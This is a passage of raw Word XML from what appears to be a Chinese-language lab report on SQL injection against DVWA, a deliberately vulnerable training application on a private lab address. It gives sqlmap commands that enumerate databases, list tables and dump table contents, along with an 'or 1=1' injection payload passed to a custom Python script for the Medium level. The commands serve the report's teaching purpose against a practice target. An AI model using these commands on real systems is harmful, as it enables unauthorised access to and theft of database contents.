              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取所有数据库：使用命令</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u 'http://10.211.55.13/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/vulnerabilities/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/?id=1&amp;Submit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241CADDC" w14:textId="0E402981" w:rsidR="006F79FA" w:rsidRPr="006F79FA" w:rsidRDefault="006F79FA" w:rsidP="006F79FA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="780" w:firstLineChars="0" w:firstLine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4745A37A" wp14:editId="653BD90A">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2296825</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>420370</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1644015" cy="73660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12-10 at 10.47.33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01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79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=Submit#' --cookie='security=low; PHPSESSID=10ce72b2e3f3ea5aa29a1492b7901c47' --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="006F79FA">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>batch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>得到数据库：</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>共</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>个数据库。如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45291B05" w14:textId="673E0E84" w:rsidR="00EC0D97" w:rsidRPr="00EC0D97" w:rsidRDefault="00EC0D97" w:rsidP="00EC0D97">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据中中的所有表：使用命令</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u 'http://10.211.55.13/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/vulnerabilities/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FDD307" w14:textId="0334A80C" w:rsidR="00EC0D97" w:rsidRDefault="00EC0D97" w:rsidP="00EC0D97">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id=1&amp;Submit=Submit#' --cookie='security=low; PHPSESSID=10ce72b2e3f3ea5aa29a1492b7901c4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510E3041" w14:textId="7B3C6E51" w:rsidR="00EC0D97" w:rsidRDefault="008F07FE" w:rsidP="00EC0D97">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="780" w:firstLineChars="0" w:firstLine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6432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="201EFDB3" wp14:editId="1CE52C7C">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2143125</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>255270</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1892935" cy="661670"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom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18-12-10 at 10.51.14 PM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93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D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">7' -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> --tables </w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>batch</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>指定扫描</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：共</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>guestbook</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>张表，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F35AFF9" w14:textId="605614EB" w:rsidR="008F07FE" w:rsidRDefault="008F07FE" w:rsidP="000B4869">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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7456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="006ABF6A" wp14:editId="7B5D5B10">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2040188</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>1518285</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2104390" cy="737870"/>
                  <wp:effectExtent l="0" t="0" r="3810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12-10 at 11.00.27 PM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39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0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="009958CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中的所有</w:t>
            </w:r>
            <w:r w:rsidR="009958CD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>简便起见以下只获取了</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中的数据，</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>使用命令</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u 'http://10.211.55.13/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#' --cookie='security=low; PHPSESSID=10ce72b2e3f3ea5aa29a1492b7901c47' -D </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> -T locations --dump </w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97" w:rsidRPr="00EC0D97">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>batch</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>指定扫描</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="00EC0D97">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>共得到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条数据元组，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="593A05A1" w14:textId="7E9C7C79" w:rsidR="000B4869" w:rsidRDefault="000B4869" w:rsidP="000B4869">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Medium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17197807" w14:textId="475107B1" w:rsidR="00F35CB5" w:rsidRPr="00F35CB5" w:rsidRDefault="00C80750" w:rsidP="00F35CB5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    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别在</w:t>
            </w:r>
            <w:r w:rsidRPr="00C80750">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>页面</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r w:rsidRPr="00C80750">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>设置了下拉选择表单</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，使得</w:t>
            </w:r>
            <w:r w:rsidR="00F35CB5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>不能直接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>构造</w:t>
            </w:r>
            <w:r w:rsidR="00F35CB5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="00F35CB5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>输入，但可以使用</w:t>
            </w:r>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://portswigger.net/burp/" </w:instrText>
            </w:r>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>burp</w:t>
            </w:r>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>uite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00F35CB5" w:rsidRPr="00F35CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31FAD26B" w14:textId="0AC9E74D" w:rsidR="00C80750" w:rsidRDefault="00F35CB5" w:rsidP="000B4869">
            <w:pPr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等工具修改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>post</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的参数进行注入，这里我使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>requests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bs</w:t>
            </w:r>
            <w:r>
              <w:rPr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库自行构造</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>post</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>参数注入并解析结果</w:t>
            </w:r>
            <w:r w:rsidR="003268FC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，源码文件：</w:t>
            </w:r>
            <w:r w:rsidR="003268FC" w:rsidRPr="003268FC">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sql_injection.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D80ECD2" w14:textId="0A9FA8AF" w:rsidR="000B4869" w:rsidRDefault="000B4869" w:rsidP="00C67919">
            <w:pPr>
              <w:ind w:firstLine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手工注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE8FAE9" w14:textId="75ABC9FC" w:rsidR="00C67919" w:rsidRPr="00C67919" w:rsidRDefault="00C67919" w:rsidP="00C67919">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C67919">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00C67919">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidRPr="00C67919">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全级别为</w:t>
            </w:r>
            <w:r w:rsidRPr="00C67919">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C3FFD3" w14:textId="6626EC81" w:rsidR="00C67919" w:rsidRDefault="003268FC" w:rsidP="00C67919">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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69504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52494086" wp14:editId="2EA0C018">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2202315</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>410845</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1523365" cy="1619885"/>
                  <wp:effectExtent l="0" t="0" r="635" b="571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12-10 at 11.17.40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6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判断是否存在注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：使用命令</w:t>
            </w:r>
            <w:r w:rsidRPr="003268FC">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>python3 sql_injection.py --id "1 or 1 = 1 #"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入，得到查询结果如下图，说明存在数字型注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="666ECC3F" w14:textId="3E0477FE" w:rsidR="003268FC" w:rsidRPr="003A37DB" w:rsidRDefault="003A37DB" w:rsidP="003A37DB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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72576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14306EDB" wp14:editId="18213F2B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2628265</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2368550" cy="1483995"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1905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8-12-10 at 11.30.20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70528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61CD170E" wp14:editId="2B8EE6F5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628265</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2126615" cy="1483995"/>
                  <wp:effectExtent l="0" t="0" r="0" b="190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12-10 at 11.26.59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61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09D15171" wp14:editId="1F464499">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>2048625</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>2628265</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1555115" cy="1483995"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905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12-10 at 11.28.12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11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68FC" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>分别获取</w:t>
            </w:r>
            <w:r w:rsidR="003268FC" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>所有数据库</w:t>
            </w:r>
            <w:r w:rsidR="004D2613" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004D2613" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004D2613" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据库中的所有表</w:t>
